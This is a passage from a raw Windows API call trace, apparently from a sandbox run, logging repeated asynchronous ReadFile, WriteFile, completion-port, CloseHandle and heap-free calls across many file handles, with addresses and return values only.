lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.358] WriteFile (in: hFile=0x2e0, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4820020) returned 1 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.359] WriteFile (in: hFile=0x610, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4940020) returned 1 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.359] WriteFile (in: hFile=0x134, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020) returned 1 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.359] WriteFile (in: hFile=0x618, lpBuffer=0x4b80124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4b80020) returned 1 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.359] WriteFile (in: hFile=0x66c, lpBuffer=0x4ca0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020) returned 1 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.359] ReadFile (in: hFile=0x620, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0150.359] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x664, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4280020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x668, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x2e0, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4820020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x610, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4940020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x134, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x618, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4b80020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.360] ReadFile (in: hFile=0x66c, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4ca0020) returned 0x0 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.360] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.361] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.361] WriteFile (in: hFile=0x620, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0150.361] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.361] WriteFile (in: hFile=0x664, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x668, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x2e0, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4820020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x610, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4940020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x134, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4a60020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x618, lpBuffer=0x4b80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4b80020) returned 1 [0150.362] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.362] WriteFile (in: hFile=0x66c, lpBuffer=0x4ca0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4ca0020) returned 1 [0150.363] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.363] CloseHandle (hObject=0x620) returned 1 [0150.364] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0150.364] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.364] CloseHandle (hObject=0x664) returned 1 [0150.365] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0150.366] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.366] CloseHandle (hObject=0x668) returned 1 [0150.366] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0150.367] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.367] CloseHandle (hObject=0x2e0) returned 1 [0150.368] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0150.368] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.368] CloseHandle (hObject=0x610) returned 1 [0150.369] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0150.369] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.369] CloseHandle (hObject=0x134) returned 1 [0150.370] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0150.370] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.370] CloseHandle (hObject=0x618) returned 1 [0150.371] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4b80020) returned 1 [0150.371] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.371] CloseHandle (hObject=0x66c) returned 1 [0150.372] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ca0020) returned 1 [0150.372] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.560] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x41f0020) returned 1 [0150.560] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.560] ReadFile (in: hFile=0x644, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 1 [0150.561] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.561] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0xe70e, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 1 [0150.561] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.561] WriteFile (in: hFile=0x644, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x4d26, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 1 [0150.561] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.561] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0150.561] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.562] ReadFile (in: hFile=0x644, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 0x0 [0150.562] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.562] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.562] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.562] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.562] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.562] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 1 [0150.562] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.562] WriteFile (in: hFile=0x644, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 1 [0150.562] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.562] CloseHandle (hObject=0x67c) returned 1 [0150.563] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0150.564] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.564] CloseHandle (hObject=0x644) returned 1 [0150.564] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0150.565] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.765] ReadFile (in: hFile=0x368, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x41f0020) returned 1 [0150.765] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.782] ReadFile (in: hFile=0x640, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 1 [0150.782] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.783] ReadFile (in: hFile=0x618, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4790020) returned 1 [0150.783] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.783] ReadFile (in: hFile=0x648, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x446f878*=0x0, 